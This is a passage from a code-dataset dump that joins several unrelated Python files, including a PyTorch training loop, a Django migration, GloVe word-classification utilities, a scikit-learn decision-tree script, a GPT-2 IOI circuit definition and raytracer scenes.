int=100, # number of epochs to train\n checkpoint: int=10, # epochs inbetween weight saving\n progress_bar: str='all', # progress bar from tqdm\n rewrite_bar: bool=False, # wether to leave the bars after each epoch\n save_predictions:bool=True, # wether to save network outputs for all events to original file\n ):\n \"\"\"\n No comments here since the code is identical to the __train_with_timing function \n except for the lack of calls to timers.\n \"\"\"\n for epoch in range(epochs):\n if (progress_bar == 'all' or progress_bar == 'train'):\n training_loop = tqdm(\n enumerate(self.meta['loader'].train_loader, 0), \n total=len(self.meta['loader'].train_loader), \n leave=rewrite_bar,\n position=0,\n colour='green'\n )\n else:\n training_loop = enumerate(self.meta['loader'].train_loader, 0)\n self.model.train()\n for ii, data in training_loop:\n for param in self.model.parameters():\n param.grad = None\n outputs = self.model(data)\n loss = self.criterion.loss(outputs, data)\n loss.backward()\n self.optimizer.step()\n if (progress_bar == 'all' or progress_bar == 'train'):\n training_loop.set_description(f\"Training: Epoch [{epoch+1}/{epochs}]\")\n training_loop.set_postfix_str(f\"loss={loss.item():.2e}\")\n if self.metrics != None:\n if (progress_bar == 'all' or progress_bar == 'train'):\n metrics_training_loop = tqdm(\n enumerate(self.meta['loader'].train_loader, 0), \n total=len(self.meta['loader'].train_loader), \n leave=rewrite_bar,\n position=0,\n colour='green'\n )\n else:\n metrics_training_loop = enumerate(self.meta['loader'].train_loader, 0)\n self.metrics.reset_batch()\n for ii, data in metrics_training_loop:\n outputs = self.model(data)\n self.metrics.update(outputs, data, train_type=\"train\")\n if (progress_bar == 'all' or progress_bar == 'train'):\n metrics_training_loop.set_description(f\"Training Metrics: Epoch [{epoch+1}/{epochs}]\")\n self.callbacks.evaluate_epoch(train_type='train')\n if (progress_bar == 'all' or progress_bar == 'validation'):\n validation_loop = tqdm(\n enumerate(self.meta['loader'].validation_loader, 0), \n total=len(self.meta['loader'].validation_loader), \n leave=rewrite_bar,\n position=0,\n colour='blue'\n )\n else:\n validation_loop = enumerate(self.meta['loader'].validation_loader, 0)\n self.model.eval()\n with torch.no_grad():\n for ii, data in validation_loop:\n outputs = self.model(data)\n loss = self.criterion.loss(outputs, data)\n if (progress_bar == 'all' or progress_bar == 'validation'):\n validation_loop.set_description(f\"Validation: Epoch [{epoch+1}/{epochs}]\")\n validation_loop.set_postfix_str(f\"loss={loss.item():.2e}\")\n if self.metrics != None:\n if (progress_bar == 'all' or progress_bar == 'validation'):\n metrics_validation_loop = tqdm(\n enumerate(self.meta['loader'].validation_loader, 0), \n total=len(self.meta['loader'].validation_loader), \n leave=rewrite_bar,\n position=0,\n colour='blue'\n )\n else:\n metrics_validation_loop = enumerate(self.meta['loader'].validation_loader, 0)\n self.metrics.reset_batch()\n for ii, data in metrics_validation_loop:\n outputs = self.model(data)\n self.metrics.update(outputs, data, train_type=\"validation\")\n if (progress_bar == 'all' or progress_bar == 'validation'):\n metrics_validation_loop.set_description(f\"Validation Metrics: Epoch [{epoch+1}/{epochs}]\")\n self.callbacks.evaluate_epoch(train_type='validation')\n if epoch % checkpoint == 0:\n if not os.path.exists(f\"{self.meta['local_scratch']}/.checkpoints/\"):\n os.makedirs(f\"{self.meta['local_scratch']}/.checkpoints/\")\n torch.save(\n self.model.state_dict(), \n f\"{self.meta['local_scratch']}/.checkpoints/checkpoint_{epoch}.ckpt\"\n )\n self.callbacks.evaluate_training()\n self.logger.info(f\"training finished.\")\n if (progress_bar == 'all' or progress_bar == 'test'):\n test_loop = tqdm(\n enumerate(self.meta['loader'].test_loader, 0), \n total=len(self.meta['loader'].test_loader), \n leave=rewrite_bar,\n position=0,\n colour='red'\n )\n else:\n test_loop = enumerate(self.meta['loader'].test_loader, 0)\n self.model.eval()\n with torch.no_grad():\n for ii, data in test_loop:\n outputs = self.model(data)\n loss = self.criterion.loss(outputs, data)\n if self.metrics != None:\n self.metrics.reset_batch()\n self.metrics.update(outputs, data, train_type=\"test\")\n if (progress_bar == 'all' or progress_bar == 'test'):\n test_loop.set_description(f\"Testing: Batch [{ii+1}/{self.meta['loader'].num_test_batches}]\")\n test_loop.set_postfix_str(f\"loss={loss.item():.2e}\")\n self.callbacks.evaluate_epoch(train_type='test')\n self.callbacks.evaluate_testing()\n self.model.save_model(flag='trained')\n if save_predictions:\n self.logger.info(f\"Running inference to save predictions.\")\n return self.inference(\n dataset_type='all',\n outputs=[output for output in self.shapes[\"output\"].keys()],\n progress_bar=progress_bar,\n rewrite_bar=rewrite_bar,\n save_predictions=True,\n )\n\n def inference(self,\n dataset_type: str='all', # which dataset to use for inference\n layers: list=[], # which forward views to save\n outputs: list=[], # which outputs to save\n save_predictions:bool=True, # wether to save the predictions\n progress_bar: bool=True, # progress bar from tqdm\n rewrite_bar: bool=True, # wether to leave the bars after each epoch\n ):\n \"\"\"\n Here we just do inference on a particular part\n of the dataset_loader, either 'train', 'validation',\n 'test' or 'all'.\n \"\"\"\n # check that everything is on the same device\n if (self.model.device != self.device):\n self.logger.error(f\"device: '{self.device}' and model device: '{self.model.device}' are different!\")\n if (self.criterion.device != self.device):\n self.logger.error(f\"device: '{self.device}' and model device: '{self.criterion.device}' are different!\")\n\n # determine loader\n if dataset_type == 'train':\n inference_loader = self.meta['loader'].train_loader\n num_batches = self.meta['loader'].num_training_batches\n inference_indices = self.meta['loader'].train_indices\n elif dataset_type == 'validation':\n inference_loader = self.meta['loader'].validation_loader\n num_batches = self.meta['loader'].num_validation_batches\n inference_indices = self.meta['loader'].validation_indices\n elif dataset_type == 'test':\n inference_loader = self.meta['loader'].test_loader\n num_batches = self.meta['loader'].num_test_batches\n inference_indices = self.meta['loader'].test_indices\n else:\n inference_loader = self.meta['loader'].all_loader\n num_batches = self.meta['loader'].num_all_batches\n inference_indices = self.meta['loader'].all_indices\n\n \"\"\"\n Set up progress bar.\n \"\"\"\n if (progress_bar == True):\n inference_loop = tqdm(\n enumerate(inference_loader, 0), \n total=len(list(inference_indices)), \n leave=rewrite_bar,\n position=0,\n colour='magenta'\n )\n else:\n inference_loop = enumerate(inference_loader, 0)\n \n # set up array for predictions\n predictions = {\n layer: [] \n for layer in layers\n }\n for output in outputs:\n predictions[output] = []\n\n self.logger.info(f\"running inference on dataset '{self.meta['dataset'].name}'.\")\n # make sure to set model to eval() during validation!\n self.model.eval()\n with torch.no_grad():\n if self.metrics != None:\n self.metrics.reset_batch()\n for ii, data in inference_loop:\n # get the network output\n model_output = self.model(data)\n for jj, key in enumerate(model_output.keys()):\n if key in predictions.keys():\n predictions[key].append([model_output[key].cpu().numpy()])\n for jj, key in enumerate(layers):\n if key in predictions.keys():\n predictions[key].append([self.model.forward_views[key].cpu().numpy()])\n # compute loss\n if self.criterion != None:\n loss = self.criterion.loss(model_output, data)\n\n # update metrics\n if self.metrics != None:\n self.metrics.update(model_output, data, train_type=\"inference\")\n\n # update progress bar\n if (progress_bar == True):\n inference_loop.set_description(f\"Inference: Batch [{ii+1}/{num_batches}]\")\n inference_loop.set_postfix_str(f\"loss={loss.item():.2e}\")\n for key in predictions.keys():\n predictions[key] = np.vstack(np.array(predictions[key], dtype=object))\n # save predictions if wanted\n if save_predictions:\n self.meta['dataset'].append_dataset_files(\n self.model.name + \"_predictions\",\n predictions,\n np.array(inference_indices, dtype=object)\n )\n self.callbacks.evaluate_inference()\n self.logger.info(f\"returning predictions.\")\n return predictions","repo_name":"Neutron-Calibration-in-DUNE/Blip","sub_path":"blip/trainer/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":33701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40697791630","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('spike', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='DataRecord',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, serialize=False, verbose_name='ID')),\n ('captured_date', models.DateField()),\n ('raw_data', models.CharField(max_length=50000)),\n ('submitted_date', models.DateField()),\n ],\n ),\n ]\n","repo_name":"ITCadre-Projects/fda","sub_path":"spike/migrations/0002_datarecord.py","file_name":"0002_datarecord.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"40823344682","text":"import unittest\nfrom tests.unit_test_helper.console_test_helper import *\n\n\nclass TestOutput(unittest.TestCase):\n\n def test(self):\n result = get_script_output(\"lab01/ch01_t04_handling_errors.py\")\n print(result)\n self.assertEqual(\"How do you make a hot dog stand?\\nYou take away its chair!\\n\", result)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"wongcyrus/ite3101_introduction_to_programming","sub_path":"tests/lab01/test_ch01_t04_handling_errors.py","file_name":"test_ch01_t04_handling_errors.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"14657916496","text":"import glove\r\nimport numpy as np\r\ntry:\r\n\tfrom .title_clear_v2 import *\r\nexcept:\r\n\tfrom title_clear_v2 import *\r\nimport functools\r\nfrom nltk.stem import WordNetLemmatizer as lt\r\nCATEGORIES = [\r\n\t\t\t'human animal bird',\r\n\t\t\t'kind soft familiar',\r\n\t\t\t'machine robot technical architecture building',\r\n\t\t\t'fantasy adventure explore hunt hunter treasure'\r\n\t\t\t]\r\n'''\r\n'speed dash fast run race jump warp',\r\n'ball roll bounce circle',\r\n'song music classic rhythm sound piano',\r\n'horror zombie blaxploitation'\r\n]\r\n'''\r\nTHREASHOLD = [\r\n\t\t\t0.4,\r\n\t\t\t0.4,\r\n\t\t\t0.4,\r\n\t\t\t0.4\r\n\t\t\t]\r\n'''\r\n0.4,\r\n0.4,\r\n0.4,\r\n0.4\r\n]\r\n'''\r\n#1. 없는 단어에 대해 -1 유형\r\n#2. -1의 개수 -> length -> -1_2_-1 : 이렇게 dictionary\r\n\r\n\r\ndef generate_category_map(g,cat,th):\r\n\tlst = cat.split()\r\n\tlst=list(map( lambda x : global_map_generate(g,x,th), lst))\r\n\treturn lst\r\ndef global_map_generate(glove_obj,word,th):\r\n\ttry:\r\n\t\twidx1 = glove_obj.dictionary[word]\r\n\texcept:\r\n\t\tprint(\"no word exsit as {}\".format(word))\r\n\t\treturn []\r\n\tword_vec = glove_obj.word_vectors[widx1]\r\n\tdst = (np.dot(glove_obj.word_vectors, word_vec) / np.linalg.norm(glove_obj.word_vectors, axis=1) / np.linalg.norm(word_vec))\r\n\tword_ids = np.argsort(-dst) #[3 0 1 2] input = [4,3,2,5]\r\n\treturn [x for x in word_ids if dst[x] >th]\r\n\r\ndef read_glove_file(filename):\r\n\tg = glove.glove.Glove.load(filename)\r\n\r\n\treturn g\r\n\r\ndef classify_word(g,input_word):\r\n\ttype_class = [0 for i in range((len(CATEGORIES)))]\r\n\tinput_word = lt().lemmatize(input_word.lower())\r\n\ttry:\r\n\t\tinput_word_idx = g.dictionary[input_word]\r\n\r\n\t\tfor i in range(len(CATEGORY_MAP)):\r\n\t\t\tmaps = CATEGORY_MAP[i]\r\n\t\t\tfor map_ in maps:\r\n\t\t\t\tif input_word_idx in map_:\r\n\t\t\t\t\ttype_class[i] = 1\r\n\r\n\texcept:\r\n\t\ttype_class[-1] = -1\r\n\t\tprint(\"no word available in dictionary: {}\".format(input_word))\r\n\r\n\treturn type_class\r\ndef similar_is(glove_obj,w1,w2):\r\n\ttry:\r\n\t\twidx1 = glove_obj.dictionary[w1]\r\n\t\twidx2 = glove_obj.dictionary[w2]\r\n\t\treturn similarity_query(glove_obj,glove_obj.word_vectors[widx1],widx2)\r\n\texcept:\r\n\t\treturn False\r\n\r\n\r\n\r\ndef similarity_query(glove_obj, word_vec, category_word_idx):\r\n\tdst = (np.dot(glove_obj.word_vectors, word_vec) / np.linalg.norm(glove_obj.word_vectors, axis=1) / np.linalg.norm(word_vec))\r\n\tif category_word_idx in glove_obj.inverse_dictionary:\r\n\t\treturn dst[category_word_idx]\r\n\telse:\r\n\t\treturn False\r\n#GLOVE_OBJ = read_glove_file('gf')\r\n#CATEGORY_MAP = list(map( lambda x: generate_category_map(GLOVE_OBJ,CATEGORIES[x],THREASHOLD[x]),range(len(CATEGORIES) )))\r\n\r\ndef test_routine():\r\n\tprint(\"No test is available\")\r\n\treturn \r\n\r\ndef generate_type_statistics(type_list):\r\n\ttypes_statistics = {}\r\n\tfor type_entity in type_list:\r\n\t\tword_type_list = type_entity[0] \r\n\t\ttitle_len = type_entity[1]\r\n\t\ttitle = type_entity[2]\r\n\t\ttn = type_num_calculate(word_type_list,title_len)\r\n\t\ttry:\r\n\t\t\ttypes_statistics[tn][0]+=1\r\n\t\t\ttypes_statistics[tn][1].append(title)\r\n\t\texcept:\r\n\t\t\ttypes_statistics[tn] = [1,[title]]\r\n\r\n\treturn types_statistics\r\n\r\ndef type_num_calculate(word_type_list, title_len):\r\n\t\r\n\ttype_num = '_'.join(list(map(str, word_type_list))) + '_' + str(title_len)\r\n\t\r\n\treturn type_num\r\ndef save_type_statistics(section):\r\n\t#file_dir = database_crawling , target = 'arcade'\r\n\ttitle_list = clear_parser(select_section('database/'+section,section),2,stereotype,stereotype_2)\r\n\tmax_title_len = 10\r\n\t#types = [[] for i in range(max_title_len)]\r\n\t\r\n\tcl_dict = read_cluster('database/'+section+'/clustered_dictionary.json')\r\n\tbigdic = {}\r\n\tfor i in range(max_title_len):\r\n\t\tbigdic[str(i)] = [[] for i in range(max_title_len)]\r\n\tfor title_ in title_list: # [ 1 2 3 4 .. ]\r\n\t\ttitle = title_\r\n\t\ttitle_len = len(title_.split()) # 안동이 할 것이다.\r\n\t\ttemp_title = []\r\n\t\tnondict_cnt = 0\r\n\t\tfor tw in title.split():\r\n\t\t\ttry:\r\n\t\t\t\ttwidx = cl_dict[tw.lower()]\r\n\t\t\texcept:\r\n\t\t\t\t#print(\"no word exsit as {}\".format(word))\r\n\t\t\t\tnondict_cnt = nondict_cnt +1\r\n\t\t\ttemp_title.append(classify_word_type2(tw.lower(),cl_dict))\r\n\r\n\t\t#types[title_len].append([temp_title,title_len,title])\r\n\t\t#print(nondict_cnt, title_len, temp_title, title)\r\n\t\tbigdic[str(nondict_cnt)][title_len].append([temp_title,title_len,title])\r\n\t#types : [list of [list of type] , title]\r\n\t# ex : title = cookie run -> types = [[[[0,1,1] ,[1,0,0]], cookie run] , [[[0,1,1] ,[1,0,0]], cookie run] , [[[0,1,1] ,[1,0,0]], cookie run]]\r\n\t# now : types = [ [ [[0,1,1], [1,0,0]], 2, cookie run ], [ [[0,1,1], [1,0,0]], 2, cookie run ] , [ [[0,1,1], [1,0,0]], 2, cookie run ] ...]\r\n\t# type_statistics --> type_statistics[type_number] = number of type_number's instance ; [0,1,1] => 3. [1,0,0] => 4\r\n\t# now : type number = [ [[0,1,1],[1,0,0]],2 ] => 342 즉 마지막자리는 글자 수\r\n\ttype_statistics = []\r\n\tfor j in range(max_title_len):\r\n\t\ttype_statistics.append([generate_type_statistics(bigdic[str(j)][i]) for i in range(max_title_len)])# if len(bigdic[str(j-i)][i])>0])\r\n\t\t#type_statistics.append([generate_type_statistics(bigdic[str(j-i)][i]) for i in range(j+1) if len(bigdic[str(j-i)][i])>0])\r\n\twith open('database/'+section+'/type_statistics.json','w') as f:\r\n\t\tjson.dump(type_statistics,f)\r\n\treturn type_statistics\r\n\r\nif __name__=='__main__':\r\n\tbigdic, type_statistics = test_routine('')\r\n\tprint (bigdic)\r\n\tprint ('---------------------------------------------')\r\n\tprint (type_statistics)\r\n'''\r\nfor x in type_statistics[2].items():\r\n\tprint(x[1][0], x[0])\r\nprint(type_statistics[1])\r\nprint(type_statistics[2])\r\nprint(type_statistics[3])\r\n'''\r\ndef read_cluster(filepath):\r\n\twith open(filepath) as f:\r\n\t\tt = json.load(f)\r\n\treturn t\r\ndef classify_word_type2(w,dict_):\r\n\t#res = []\r\n\t#for w in w_list:\r\n\ttry:\r\n\t\tt = dict_[w]\r\n\texcept:\r\n\t\tt = -1\r\n\t\t#res.append(t)\r\n\t#res.append(len(w_list))\r\n\t#return '_'.join(res)\r\n\treturn t\r\n","repo_name":"hyun78/Eureka","sub_path":"Eureka_web/app/word_classification.py","file_name":"word_classification.py","file_ext":"py","file_size_in_byte":5729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19854227156","text":"import easyocr\nreader = easyocr.Reader(['ch_sim','en']) # this needs to run only once to load the model into memory\n# result = reader.readtext('chinese.jpg')\nresult = reader.readtext('position1.png')\n\ndef f1(a):\n '''\n 输入的a是一个列表,每一条数据是四个坐标,每一个坐标是一个横坐标,一个纵坐标。\n '''\n output = 0\n #what is i?\n for i in a:\n if i[0] == [720, 346]:\n output = i\n return output\n\ndef f2(b):\n output = 0\n for i in b:\n if i[0][0] ==[720, 346]:\n output = i[1]\n return output\nlist_positions = []\nfor i in result:\n list_positions.append(i[0])\n # print(i,type(i),i[0])\n\nfor i in list_positions:\n print(i,type(i),i[0],i[1])\n if i[0] == [720, 346]:\n print('here')\n\nprint(f2(result))\n#\"\"\"\n'''\n如何用正则表达式提取字符串中特定的格式,比如()?比如括号里面的内容?\n如何做饭。吃什么?怎么做饭好吃?\n我的筷子在哪里?如何洗锅?\n\n'''\n\n","repo_name":"YaoPeixuan/A","sub_path":"a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41398932118","text":"from sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.tree import DecisionTreeClassifier\nimport csv\n\n\ndef algorithm_decision(x_train, y_train, x_test, y_test, algorithm, name):\n classifier = DecisionTreeClassifier(criterion=algorithm)\n classifier.fit(x_train, y_train)\n y_prediction = classifier.predict(x_test)\n print(\"-----------{} Decision tree: -----------------\".format(name))\n print(\"+++++++++++ confusion matrix +++++++++++++++++++\")\n print(confusion_matrix(y_test, y_prediction))\n print(\"+++++++++++ classification result ++++++++++++++\")\n print(classification_report(y_test, y_prediction))\n correct = 0\n for i in range(len(y_prediction)):\n if y_test[i] == y_prediction[i]:\n correct += 1\n print(\"+++++++++++ Accuracy ++++++++++++++++++++\")\n print(correct / float(len(y_test)))\n\n\ndef main():\n\n traindata = csv.reader(open('aps_failure_training_set.csv'))\n train = []\n for row in traindata:\n train.append(list(row))\n\n for i in range(1, len(train[21])):\n pos = 0.0\n neg = 0.0\n posc = 0\n negc = 0\n for j in range(21, len(train)):\n if train[j][0] == 'pos' and train[j][i] != 'na':\n pos += float(train[j][i])\n posc += 1\n elif train[j][0] == 'neg' and train[j][i] != 'na':\n neg += float(train[j][i])\n negc += 1\n if posc != 0:\n pos = pos / posc\n if negc != 0:\n neg = neg / negc\n for j in range(21, len(train)):\n if train[j][i] == 'na' and train[j][0] == 'neg':\n train[j][i] = str(neg)\n if train[j][i] == 'na' and train[j][0] == 'pos':\n train[j][i] = str(pos)\n\n y_train = []\n x_train = []\n for o in range(21, len(train)):\n x = []\n for i in range(1, len(train[21])):\n x.append(train[o][i])\n x_train.append(x)\n\n for m in range(21, len(train)):\n y_train.append(train[m][0])\n\n\n testdata = csv.reader(open('aps_failure_test_set.csv'))\n test = []\n for row in testdata:\n test.append(list(row))\n\n for i in range(1, len(test[21])):\n pos = 0.0\n neg = 0.0\n posc = 0\n negc = 0\n for j in range(21, len(test)):\n if test[j][0] == 'pos' and test[j][i] != 'na':\n pos += float(test[j][i])\n posc += 1\n elif test[j][0] == 'neg' and test[j][i] != 'na':\n neg += float(test[j][i])\n negc += 1\n if posc != 0:\n pos = pos / posc\n if negc != 0:\n neg = neg / negc\n for j in range(21, len(test)):\n if test[j][i] == 'na' and test[j][0] == 'neg':\n test[j][i] = str(neg)\n if test[j][i] == 'na' and test[j][0] == 'pos':\n test[j][i] = str(pos)\n\n y_test = []\n x_test = []\n for o in range(21, len(test)):\n x = []\n for i in range(1, len(test[21])):\n x.append(test[o][i])\n x_test.append(x)\n\n for m in range(21, len(test)):\n y_test.append(test[m][0])\n\n\n for (algorithm, name) in [(\"gini\", \"ID3\"), (\"entropy\", \"C4.5\")]:\n algorithm_decision(x_train, y_train, x_test, y_test, algorithm, name)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mhaghshomar/entropy-C4.5-classification-scania-and-trucks","sub_path":"scania.py","file_name":"scania.py","file_ext":"py","file_size_in_byte":3346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1307774683","text":"# Based on:\n# https://github.com/ArthurConmy/Automatic-Circuit-Discovery/blob/main/acdc/ioi/utils.py\n# I added the token positions based on the findings in the paper\nfrom dataclasses import dataclass\nfrom typing import Dict, List, Optional, Set, Tuple\n\nfrom auto_circuit.types import Edge\nfrom auto_circuit.utils.patchable_model import PatchableModel\n\nIOI_CIRCUIT = {\n \"name mover\": [\n (9, 9), # by importance\n (10, 0),\n (9, 6),\n ],\n \"backup name mover\": [\n (10, 10),\n (10, 6),\n (10, 2),\n (10, 1),\n (11, 2),\n (9, 7),\n (9, 0),\n (11, 9),\n ],\n \"negative\": [(10, 7), (11, 10)],\n \"s2 inhibition\": [(7, 3), (7, 9), (8, 6), (8, 10)],\n \"induction\": [(5, 5), (5, 8), (5, 9), (6, 9)],\n \"duplicate token\": [\n (0, 1),\n (0, 10),\n (3, 0),\n # (7, 1),\n ], # unclear exactly what (7,1) does\n \"previous token\": [\n (2, 2),\n # (2, 9),\n (4, 11),\n # (4, 3),\n # (4, 7),\n # (5, 6),\n # (3, 3),\n # (3, 7),\n # (3, 6),\n ],\n}\n\n\n@dataclass(frozen=True)\nclass Conn:\n inp: str\n out: str\n qkv: List[Tuple[Optional[str], int]]\n\n\ndef ioi_true_edges(model: PatchableModel, token_positions: bool = False) -> Set[Edge]:\n assert model.cfg.model_name == \"gpt2\"\n\n special_connections: List[Conn] = [\n Conn(\"INPUT\", \"previous token\", [(\"q\", 5), (\"k\", 4), (\"v\", 4)]),\n Conn(\"INPUT\", \"duplicate token\", [(\"q\", 10), (\"k\", 4), (\"v\", 4)]),\n Conn(\"INPUT\", \"s2 inhibition\", [(\"q\", 14)]),\n Conn(\"INPUT\", \"negative\", [(\"k\", 2), (\"v\", 2)]),\n Conn(\"INPUT\", \"name mover\", [(\"k\", 2), (\"v\", 2)]),\n Conn(\"INPUT\", \"backup name mover\", [(\"k\", 2), (\"v\", 2)]),\n Conn(\"previous token\", \"induction\", [(\"k\", 5), (\"v\", 5)]),\n Conn(\"induction\", \"s2 inhibition\", [(\"k\", 10), (\"v\", 10)]),\n Conn(\"duplicate token\", \"s2 inhibition\", [(\"k\", 10), (\"v\", 10)]),\n Conn(\"s2 inhibition\", \"negative\", [(\"q\", 14)]),\n Conn(\"s2 inhibition\", \"name mover\", [(\"q\", 14)]),\n Conn(\"s2 inhibition\", \"backup name mover\", [(\"q\", 14)]),\n Conn(\"negative\", \"OUTPUT\", [(None, 14)]),\n Conn(\"name mover\", \"OUTPUT\", [(None, 14)]),\n Conn(\"backup name mover\", \"OUTPUT\", [(None, 14)]),\n ]\n edges_present: Dict[str, int] = {}\n for conn in special_connections:\n edge_src_names, edge_dests = [], []\n if conn.inp == \"INPUT\":\n edge_src_names = [\"Resid Start\"]\n else:\n for (layer, head) in IOI_CIRCUIT[conn.inp]:\n edge_src_names.append(f\"A{layer}.{head}\")\n if conn.out == \"OUTPUT\":\n assert len(conn.qkv) == 1\n final_tok_idx = conn.qkv[0][1]\n edge_dests.append((\"Resid End\", final_tok_idx))\n else:\n for (layer, head) in IOI_CIRCUIT[conn.out]:\n for qkv in conn.qkv:\n assert qkv[0] is not None\n edge_dests.append((f\"A{layer}.{head}.{qkv[0].upper()}\", qkv[1]))\n\n # Connect all MLPS in between heads in the circuit\n # (in the IOI paper they allow activations to flow through MLPs,\n # which is equalivent to including all MLPs in between two nodes.)\n if conn.inp == \"INPUT\":\n src_layer = 0\n else:\n src_layer = min([layer for (layer, _) in IOI_CIRCUIT[conn.inp]])\n\n if conn.out == \"OUTPUT\":\n dest_layer = conn.qkv[0][1]\n else:\n dest_layer = max([layer for (layer, _) in IOI_CIRCUIT[conn.out]])\n dest_tok_idxs = [tok_idx for (_, tok_idx) in conn.qkv]\n\n # Src layer is inclusive because MLP comes after ATTN\n for layer in range(src_layer, dest_layer):\n for tok_idx in dest_tok_idxs:\n edge_src_names.append(f\"MLP {layer}\")\n edge_dests.append((f\"MLP {layer}\", tok_idx))\n\n for src_name in edge_src_names:\n for dest_name, tok_pos in edge_dests:\n edges_present[f\"{src_name}->{dest_name}\"] = tok_pos\n\n true_edges: Set[Edge] = set()\n for edge in model.edges:\n if edge.name in edges_present.keys():\n if token_positions:\n true_edges.add(Edge(edge.src, edge.dest, edges_present[edge.name]))\n else:\n true_edges.add(edge)\n return true_edges\n","repo_name":"UFO-101/auto-circuit","sub_path":"auto_circuit/metrics/official_circuits/ioi_official.py","file_name":"ioi_official.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"203997739","text":"import math\nfrom Color import Color\nfrom Tuple import Tuple\nfrom Canvas import Canvas\nfrom Matrix import Matrix\nfrom Ray import Ray\nfrom Sphere import Sphere\nfrom Plane import Plane\nfrom Intersection import Intersection\nfrom Material import Material\nfrom Light import Light\nfrom World import World\nfrom Camera import Camera\nfrom Pattern import Pattern\nfrom Cube import Cube\nfrom Group import Group\nfrom Cylinder import Cylinder\nfrom Cone import Cone\n\n\ndef image1():\n o = Tuple.point(0, 0, -5)\n wallZ = 10\n wallSize = 7\n canvasPixel = 100\n pixSize = wallSize/canvasPixel\n half = wallSize/2\n canv = Canvas(canvasPixel, canvasPixel)\n color = Color(1, 0, 0)\n s = Sphere()\n s.transform = Matrix.shearing(1, 0, 0, 0, 0, 0) * Matrix.scaling(0.5, 1, 1)\n for y in range(canvasPixel):\n wy = half-pixSize*y\n for x in range(canvasPixel):\n wx = pixSize*x-half\n position = Tuple.point(wx, wy, wallZ)\n r = Ray(o, (position-o).normalize())\n count, xs = s.intersect(r)\n if Intersection.hit(xs) != Intersection():\n canv.writePixel(x, y, color)\n canv.saveImage(\"image1\")\n\n\ndef image2():\n o = Tuple.point(0, 0, -5)\n wallZ = 10\n wallSize = 7\n canvasPixel = 100\n pixSize = wallSize/canvasPixel\n half = wallSize/2\n canv = Canvas(canvasPixel, canvasPixel)\n\n # sphere\n s = Sphere()\n s.material.color = Color(1, 0.2, 1)\n s.transform = Matrix.shearing(1, 0, 0, 0, 0, 0) * Matrix.scaling(0.5, 1, 1)\n\n # light\n light = Light(Tuple.point(-10, 10, -10), Color(1, 1, 1))\n\n for y in range(canvasPixel):\n wy = half-pixSize*y\n for x in range(canvasPixel):\n wx = pixSize*x-half\n position = Tuple.point(wx, wy, wallZ)\n r = Ray(o, (position-o).normalize())\n count, xs = s.intersect(r)\n h = Intersection.hit(xs)\n if h != Intersection():\n p = r.position(h.t)\n normal = h.shape.normalAt(p)\n eye = ~r.direction\n color = h.shape.material.lighting(light, p, eye, normal)\n canv.writePixel(x, y, color)\n canv.saveImage(\"image2\")\n\n\ndef image3():\n floor = Plane()\n floor.transform = Matrix.scaling(10, 0.01, 10)\n floor.material = Material(color=Color(1, 0.9, 0.9), specular=0)\n\n leftWall = Plane()\n leftWall.transform = Matrix.translation(\n 0, 0, 5) * Matrix.rotateY(-math.pi/4) * Matrix.rotateX(math.pi/2)*Matrix.scaling(10, 0.01, 10)\n leftWall.material = Material(color=Color(1, 0.9, 0.9), specular=0)\n\n rightWall = Plane()\n rightWall.transform = Matrix.translation(\n 0, 0, 5) * Matrix.rotateY(math.pi/4) * Matrix.rotateX(math.pi/2)*Matrix.scaling(10, 0.01, 10)\n rightWall.material = Material(color=Color(1, 0.9, 0.9), specular=0)\n\n mid = Sphere()\n # print(mid.material.pattern)\n mid.transform = Matrix.translation(-0.5, 1, 0.5)\n mid.material = Material(color=Color(0.1, 1, 0.5),\n specular=0.3, diffuse=0.7)\n\n right = Cube()\n # print(\"Change Pattern\")\n # print(right.pattern)\n right.transform = Matrix.translation(\n 1.5, 0.5, -0.5)*Matrix.scaling(0.5, 0.5, 0.5)\n right.material = Material(color=Color(\n 0.5, 1, 0.1), specular=0.3, diffuse=0.7)\n right.material.pattern = Pattern(\n Color(0, 0, 0), Color(1, 1, 1), patternType=\"gradient\")\n\n left = Sphere()\n left.transform = Matrix.translation(\n -1.5, 0.33, -0.75)*Matrix.scaling(0.33, 0.33, 0.33)\n left.material = Material(color=Color(1, 0.8, 0.1),\n specular=0.3, diffuse=0.7)\n\n shapes = [floor, leftWall, rightWall, mid, right, left]\n lights = [Light(Tuple.point(-10, 10, -10), Color(1, 1, 1))]\n\n w = World(lights, shapes)\n\n c = Camera(100, 50, math.pi/3)\n c.transform = Matrix.viewTransformation(\n Tuple.point(0, 1.5, -5),\n Tuple.point(0, 1, 0),\n Tuple.vector(0, 1, 0)\n )\n\n image = c.render(w)\n image.saveImage(\"image4\")\n\n\ndef image4():\n # corner of a hexagon\n def hexCorner():\n c = Sphere()\n c.transform = Matrix.translation(\n 0, 0, -1) * Matrix.scaling(0.25, 0.25, 0.25)\n return c\n\n # edge of a hexagon\n def hexEdge():\n e = Cylinder(0, 1)\n e.transform = Matrix.translation(\n 0, 0, -1) * Matrix.rotateY(-math.pi/6) * Matrix.rotateZ(-math.pi/2) * Matrix.scaling(0.25, 1, 0.25)\n return e\n\n # side of a hexagon\n def hexSide():\n s = Group([hexCorner(), hexEdge()])\n return s\n\n hexagon = Group()\n for i in range(6):\n s = 